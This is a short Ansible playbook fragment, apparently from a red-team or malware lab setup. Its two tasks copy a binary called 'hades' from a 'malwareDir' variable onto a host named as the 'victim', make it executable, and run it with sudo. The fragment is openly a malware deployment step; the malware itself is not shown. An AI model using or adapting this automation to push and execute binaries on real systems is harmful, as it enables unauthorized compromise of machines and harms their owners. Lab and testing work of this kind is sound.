    - name: copying hades to victim
      become: true 
      copy:
        src: "{{ malwareDir }}/hades"
        dest: "{{ DeployDir }}"
    - name: This command will change the working directory and run hades
      ansible.builtin.shell:
        cmd: sudo chmod +x hades && sudo ./hades
        chdir: "{{ DeployDir }}"


